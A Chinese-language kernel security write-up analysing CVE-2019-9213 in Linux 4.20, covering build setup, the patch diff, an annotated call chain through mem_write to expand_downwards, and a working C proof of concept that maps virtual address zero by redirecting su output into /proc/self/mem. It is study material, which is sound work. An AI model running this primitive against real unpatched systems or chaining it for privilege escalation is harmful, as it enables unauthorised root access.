影响版本:Linux-4.20.14以前(v4.20.14已修补),CVSS评分5.5分。
测试版本:Linux-4.20.7 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory
编译选项: CONFIG_SLAB=y
General setup
—> Choose SLAB allocator (SLUB (Unqueued Allocator))
—> SLAB
在编译时将 .config 中的 CONFIG_E1000 和 CONFIG_E1000E 变更为 =y。参考
$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.20.7.tar.xz
$ tar -xvf linux-4.20.7.tar.xz
# KASAN: 在 make menuconfig 中设置 "Kernel hacking" -> "Memory Debugging" -> "KASan: runtime memory debugger"。
$ make -j32
$ make all
$ make modules
# 编译出的bzImage位于内核源码目录下的 arch/x86/boot/bzImage。
漏洞描述:mm/mmap.c 中的 expand_downwards() 缺乏对mmap最小地址的检查,攻击者可以在没有SMAP保护的情况下利用空指针解引用,主要原因是对错误的task进行了capability检查。这个漏洞可以绕过 mmap_min_addr 的限制,再配合一个空指针解引用就有可能提权。现有两种提权的exp——CVE-2019-9213+CVE-2018-5333 和 CVE-2019-9213+CVE-2019-8956 。
补丁:patch 不再调用 security_mmap_addr() 函数,而是直接将 address 和 mmap_min_addr 比较。
diff --git a/mm/mmap.c b/mm/mmap.c
index f901065c4c64c..fc1809b1bed67 100644
--- a/mm/mmap.c
+++ b/mm/mmap.c
@@ -2426,12 +2426,11 @@ int expand_downwards(struct vm_area_struct *vma,
{
struct mm_struct *mm = vma->vm_mm;
struct vm_area_struct *prev;
- int error;
+ int error = 0;
address &= PAGE_MASK;
- error = security_mmap_addr(address);
- if (error)
- return error;
+ if (address < mmap_min_addr)
+ return -EPERM;
/* Enforce stack_guard_gap */
prev = vma->vm_prev;
保护机制:开启SMEP,关闭SMAP/kaslr。
利用总结:利用 LD_DEBUG=help /bin/su 1>&%d 命令执行write操作,本来应检测exp进程的cred,结果错误地检测了执行write的进程的cred,于是将低地址标记为特权可访问。
测试说明:只有在32位系统下才能成功利用,现有的结合本漏洞利用成功的exp都是32位环境,64位环境不能成功。我编译出v4.20.7的32位版本,能够成功利用。由于64位不成功,我就放弃编译了,直接用xman训练营提供的bzimage环境。
一、漏洞分析
漏洞函数调用链:expand_downwards() -> security_mmap_addr() -> cap_mmap_addr()
/*
 * expand_downwards() as it looked before the fix (excerpt; the remainder of
 * the body is elided with "..."). The address is masked with PAGE_MASK and
 * the only gate on it is the return value of security_mmap_addr().
 */
int expand_downwards(struct vm_area_struct *vma,
unsigned long address)
{
struct mm_struct *mm = vma->vm_mm;
struct vm_area_struct *prev;
int error;
address &= PAGE_MASK;
error = security_mmap_addr(address); // <---------- permission check
if (error)
return error;
...
}
/* Thin wrapper: forwards the address check unchanged to cap_mmap_addr(). */
static inline int security_mmap_addr(unsigned long addr)
{
return cap_mmap_addr(addr); // <---------- next hop in the call chain
}
// Decides whether a low address may be used. When the write is performed by running `LD_DEBUG=help su 1>&%d` through system(), the current_cred() checked here belongs to the process executing the write, not to the process whose vma is being changed. Because that write runs as root, the check passes.
int cap_mmap_addr(unsigned long addr)
{
int ret = 0;
if (addr < dac_mmap_min_addr) { // dac_mmap_min_addr=0x1000 (value as reported by the write-up author)
ret = cap_capable(current_cred(), &init_user_ns, CAP_SYS_RAWIO,
SECURITY_CAP_AUDIT);
/* set PF_SUPERPRIV if it turns out we allow the low mmap */
if (ret == 0)
current->flags |= PF_SUPERPRIV; // check passed: PF_SUPERPRIV is set on current
}
return ret;
}
write() 函数调用链:mem_write() -> mem_rw() -> access_remote_vm() -> __access_remote_vm() -> get_user_pages_remote() -> __get_user_pages_locked() -> __get_user_pages() -> find_extend_vma() -> expand_stack() -> expand_downwards() -> security_mmap_addr() -> cap_mmap_addr()
Linux对于文件系统通用的结构体是 file_operations ,fs/proc/base.c 中的代码提供与 /proc 相关的操作——proc_mem_operations(.write = mem_write)。这样执行 su >&%d < /dev/null 往 /proc/self/mem 写入数据时,实际会调用 mem_write()。
// (1) mem_write(): write handler; delegates to mem_rw() with the write flag set to 1.
static ssize_t mem_write(struct file *file, const char __user *buf,
size_t count, loff_t *ppos)
{
return mem_rw(file, (char __user*)buf, count, ppos, 1); // <--------- continue into mem_rw()
}
// (2) mem_rw(): shared read/write path (excerpt; the setup code is elided with "... ...").
// Returns the number of bytes copied, or -EFAULT / -EIO as set in the loop below.
static ssize_t mem_rw(struct file *file, char __user *buf,
size_t count, loff_t *ppos, int write)
{
... ...
/*
 * Per iteration, at most PAGE_SIZE bytes are handled.
 * Write: copy_from_user() first copies the data from buf into the allocated
 * page, then access_remote_vm() writes it into the target mm.
 * Read: the reverse - access_remote_vm() reads from the target mm into the
 * page, then copy_to_user() copies the page out to buf.
 */
while (count > 0) {
int this_len = min_t(int, count, PAGE_SIZE);
if (write && copy_from_user(page, buf, this_len)) {
copied = -EFAULT;
break;
}
this_len = access_remote_vm(mm, addr, page, this_len, flags); // <-------- called in a loop to access the target mm's memory
if (!this_len) {
/* Nothing transferred: report -EIO only if no earlier chunk succeeded. */
if (!copied)
copied = -EIO;
break;
}
if (!write && copy_to_user(buf, page, this_len)) {
copied = -EFAULT;
break;
}
buf += this_len;
addr += this_len;
copied += this_len;
count -= this_len;
}
*ppos = addr;
mmput(mm);
free:
free_page((unsigned long) page);
return copied;
}
// (3) access_remote_vm(): wrapper that calls __access_remote_vm() with a NULL task pointer.
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
void *buf, int len, unsigned int gup_flags)
{
return __access_remote_vm(NULL, mm, addr, buf, len, gup_flags); // <-------- continue into __access_remote_vm()
}
// (4) __access_remote_vm(): copies len bytes between buf and address addr of mm, one page at a time
// (excerpt; the ret <= 0 branch is elided with "... ..."). Returns the number of bytes transferred.
int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
unsigned long addr, void *buf, int len, unsigned int gup_flags)
{
struct vm_area_struct *vma;
void *old_buf = buf;
int write = gup_flags & FOLL_WRITE;
down_read(&mm->mmap_sem);
/* ignore errors, just check how much was successfully transferred */
while (len) {
int bytes, ret, offset;
void *maddr;
struct page *page = NULL;
ret = get_user_pages_remote(tsk, mm, addr, 1, // <------------- get_user_pages_remote() vs. get_user_pages() is compared further below
gup_flags, &page, &vma, NULL);
if (ret <= 0) {
... ...
} else {
/* Clamp the chunk so it does not cross the end of the current page. */
bytes = len;
offset = addr & (PAGE_SIZE-1);
if (bytes > PAGE_SIZE-offset)
bytes = PAGE_SIZE-offset;
maddr = kmap(page);
if (write) {
copy_to_user_page(vma, page, addr,
maddr + offset, buf, bytes);
set_page_dirty_lock(page);
} else {
copy_from_user_page(vma, page, addr,
buf, maddr + offset, bytes);
}
kunmap(page);
put_page(page);
}
len -= bytes;
buf += bytes;
addr += bytes;
}
up_read(&mm->mmap_sem);
return buf - old_buf;
}
// get_user_pages_remote() and get_user_pages() (difference: whether another process's mm is accessed) are both wrappers around __get_user_pages_locked(); per the write-up, their job is to look up the given virtual address range and pin it to pages. In __access_remote_vm() the page is then mapped with kmap() (described by the author as the permanent kernel mapping area); for a write, copy_to_user_page() is called followed by set_page_dirty_lock() to mark the page dirty; for a read, copy_from_user_page() is called. Finally kunmap() removes the mapping.
// (5-1) get_user_pages_remote() -- the FOLL_REMOTE flag is added here to tell the two apart
long get_user_pages_remote(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,
struct vm_area_struct **vmas, int *locked)
{
return __get_user_pages_locked(tsk, mm, start, nr_pages, pages, vmas, // <-------- continue into __get_user_pages_locked()
locked,
gup_flags | FOLL_TOUCH | FOLL_REMOTE);
}
EXPORT_SYMBOL(get_user_pages_remote);
// (5-2) get_user_pages(): same wrapper, but always operates on current / current->mm,
// passes NULL for locked, and does not add FOLL_REMOTE.
long get_user_pages(unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,
struct vm_area_struct **vmas)
{
return __get_user_pages_locked(current, current->mm, start, nr_pages,
pages, vmas, NULL,
gup_flags | FOLL_TOUCH);
}
EXPORT_SYMBOL(get_user_pages);
// (6) __get_user_pages_locked(): loops over __get_user_pages() until nr_pages pages are pinned
// or an early-exit condition is hit (excerpt; declarations are elided with "... ...").
// Returns pages_done, or the raw __get_user_pages() result on the early-return paths.
static __always_inline long __get_user_pages_locked(struct task_struct *tsk,
struct mm_struct *mm,
unsigned long start,
unsigned long nr_pages,
struct page **pages,
struct vm_area_struct **vmas,
int *locked,
unsigned int flags)
{
... ...
pages_done = 0;
lock_dropped = false;
for (;;) {
/*
 * __get_user_pages(): pins nr_pages pages starting at start into pages.
 * A return value > 0 (the number of pages pinned) means success: nr_pages
 * is decreased, pages_done is increased, and the loop exits once nr_pages
 * reaches 0.
 */
ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
vmas, locked);
if (!locked)
/* VM_FAULT_RETRY couldn't trigger, bypass */
return ret;
/* VM_FAULT_RETRY cannot return errors */
if (!*locked) {
BUG_ON(ret < 0);
BUG_ON(ret >= nr_pages);
}
if (!pages)
/* If it's a prefault don't insist harder */
return ret;
if (ret > 0) {
nr_pages -= ret;
pages_done += ret;
if (!nr_pages)
break;
}
if (*locked) {
/*
 * VM_FAULT_RETRY didn't trigger or it was a
 * FOLL_NOWAIT.
 */
if (!pages_done)
pages_done = ret;
break;
}
/* VM_FAULT_RETRY triggered, so seek to the faulting offset */
pages += ret;
start += ret << PAGE_SHIFT;
/*
 * Repeat on the address that fired VM_FAULT_RETRY
 * without FAULT_FLAG_ALLOW_RETRY but with
 * FAULT_FLAG_TRIED.
 */
*locked = 1;
lock_dropped = true;
/*
 * Retry pinning a single page. If the retry does not return 1 the loop
 * exits; otherwise nr_pages is decremented, pages_done incremented and
 * start advanced by PAGE_SIZE before the next iteration.
 * Per the write-up, __get_user_pages() looks up the vma by calling
 * find_extend_vma() (that code is not shown in this excerpt).
 */
down_read(&mm->mmap_sem);
ret = __get_user_pages(tsk, mm, start, 1, flags | FOLL_TRIED,
pages, NULL, NULL);
if (ret != 1) {
BUG_ON(ret > 1);
if (!pages_done)
pages_done = ret;
break;
}
nr_pages--;
pages_done++;
if (!nr_pages)
break;
pages++;
start += PAGE_SIZE;
}
if (lock_dropped && *locked) {
/*
 * We must let the caller know we temporarily dropped the lock
 * and so the critical section protected by it was lost.
 */
up_read(&mm->mmap_sem);
*locked = 0;
}
return pages_done;
}
// (7) __get_user_pages() (code not shown) -- per the write-up: it first looks up the vma, then calls follow_page_mask() to walk the page tables for the physical page behind the virtual address; if that returns NULL it calls faultin_page(). The resulting page pointer is stored in the pages array.
// (8) find_extend_vma() -- __get_user_pages() looks up the vma by calling this function. If vma->vm_start <= addr, addr lies inside the vma; otherwise addr falls into the hole below it. If the vma has VM_GROWSDOWN set, expand_stack() is called to grow the vma toward lower addresses. The vulnerability is that the expanded address is not validated: the `address < mmap_min_addr` check is missing, so the mapping can be grown down to address NULL.
struct vm_area_struct *
find_extend_vma(struct mm_struct *mm, unsigned long addr)
{
struct vm_area_struct *vma;
unsigned long start;
addr &= PAGE_MASK;
vma = find_vma(mm, addr);
if (!vma)
return NULL;
if (vma->vm_start <= addr)
return vma;
/* addr is below the vma: only a VM_GROWSDOWN vma may be extended to cover it. */
if (!(vma->vm_flags & VM_GROWSDOWN))
return NULL;
start = vma->vm_start;
if (expand_stack(vma, addr)) // <--------- non-zero return means the expansion failed
return NULL;
if (vma->vm_flags & VM_LOCKED)
populate_vma_page_range(vma, addr, start, NULL);
return vma;
}
// (9) expand_stack(): in this excerpt it simply forwards to expand_downwards().
int expand_stack(struct vm_area_struct *vma, unsigned long address)
{
return expand_downwards(vma, address);
}
总的来说,在最终写入的地址小于 vma->vm_start 时,如果该vma设置了 VM_GROWSDOWN 标志的话,就会调用 expand_downwards() 函数扩展vma,空间不足时会向低地址进行扩展。漏洞就是没有对扩展后的地址进行合理性校验,缺少 address < mmap_min_addr 的判断条件,就可以mmap到NULL地址。
二、漏洞利用
poc分析:触发漏洞的点在于通过 su >&%d < /dev/null 向 /proc/self/mem 中写入了数据,写什么数据不重要(有su就行,读写其它进程的 /proc/$pid/mem 需要 PTRACE_ATTACH 权限),重要的是通过它调用write函数。
// poc
/*
 * mmap_zero() - try to get the page at virtual address 0 mapped.
 *
 * Maps one MAP_GROWSDOWN page at 0x10000, opens /proc/self/mem, and then,
 * for every page below 0x10000 down to address 0, seeks the fd to that
 * address and runs `su` with its stdout redirected to the fd. What su
 * prints does not matter; what matters is that the write() on
 * /proc/self/mem is issued by the su process.
 *
 * Exits via err()/errx() with status 2 on any setup failure. The exit
 * status of su itself is deliberately NOT checked: su is expected to fail
 * with stdin redirected from /dev/null, and only the write matters.
 */
void mmap_zero(void)
{
    unsigned long addr = (unsigned long)mmap((void *)0x10000, 0x1000,
                                             PROT_READ | PROT_WRITE | PROT_EXEC,
                                             MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED,
                                             -1, 0);
    if (addr != 0x10000)
        err(2, "mmap failed");

    int fd = open("/proc/self/mem", O_RDWR);
    if (fd == -1)
        err(2, "open mem failed");

    char cmd[0x100] = {0};
    /* Bounded formatting: never write past cmd, and detect truncation. */
    int len = snprintf(cmd, sizeof cmd, "su >&%d < /dev/null", fd);
    if (len < 0 || (size_t)len >= sizeof cmd)
        errx(2, "command too long");

    while (addr)
    {
        addr -= 0x1000;
        if (lseek(fd, addr, SEEK_SET) == -1)
            err(2, "lseek failed");
        /* -1 means the shell could not be spawned at all, so no write happened. */
        if (system(cmd) == -1)
            err(2, "system failed");
    }

    /* The fd is no longer needed once every page has been touched. */
    close(fd);

    /* Reading from address 1 only works if page 0 is now mapped. */
    printf("contents:%s\n", (char *)1);
}
参考
CVE-2019-9213——linux内核用户空间0虚拟地址映射漏洞分析
CVE-2019-9213、CVE-2019-8956的分析以及组合提权